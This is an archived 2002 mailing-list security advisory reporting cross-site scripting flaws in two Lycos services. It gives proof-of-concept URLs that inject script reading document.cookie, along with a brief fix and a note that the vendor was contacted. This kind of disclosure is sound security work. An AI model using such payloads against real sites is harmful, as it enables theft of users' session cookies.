[CSS] Cross Site Scripting in the translation and infoplease services of lycos.com possible

From: tsr@it-checkpoint.net
Date: Thu Mar 14 2002 - 06:15:29 PST

Next message: Casper Dik: "Re: ZLib double free bug: Windows NT potentially unaffected"

Previous message: John D Groenveld: "Re: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------
itcp advisory 4 advisories@it-checkpoint.net
http://www.it-checkpoint.net/advisory/4.html
March  14th, 2002
- -------------------------------------------------------------



translation.lycos.com and infoplease.lycos.com allow Cross Site
Scripting
- --------------------------

Affected program: -
Vendor: Lycos.com
Vulnerability-Class: Cross Site Scripting (CSS)
OS specific: No
Problem-Type: remote




SUMMARY

Cross Site Scripting in the translation and infoplease services of
lycos.com possible




DETAILS

The translation and infoplease services of lycos.com are not checking
for any hostile input so it is able to steal cookies.

Bug analysis: Missing filters for Characters like "<" or ">"



Impact: Stealing of cookies possible



Exploit:

The only thing you have to do is entering some HTML-Code in the
textbox or
just click on the following links:


translation.lycos.com:
http://translation.lycos.com/?urltext=>alert(document.cookie)</
script
>&lp=en_de&partner=demo-Lycos2-en

- --------------

infoplease.lycos.com:
http://www.infoplease.lycos.com/search.php3?in=dictionary&query=
e><scr
ipt>alert(document.cookie)</script>


Solution: Implement a filter which filters dangerous characters,
especially "<" and ">"



ADDITIONAL INFORMATION
Vendor has been contacted.




- - -------------------------------------------------------
tSR <tsr@it-checkpoint.net>
Member of:
http://www.IT-Checkpoint.net

We work for your security


- - -----------------------
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty
of any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits
or
special damages.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPJCweCoElucNbCmCEQJ4owCg1uP6UotWtqeEWAgKPvP/wFbhkzcAoIF6
pRXZwkWImhsIXW2Cq/eQF9AF
=MetP
-----END PGP SIGNATURE-----

Next message: Casper Dik: "Re: ZLib double free bug: Windows NT potentially unaffected"
Previous message: John D Groenveld: "Re: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 17:22:34 PST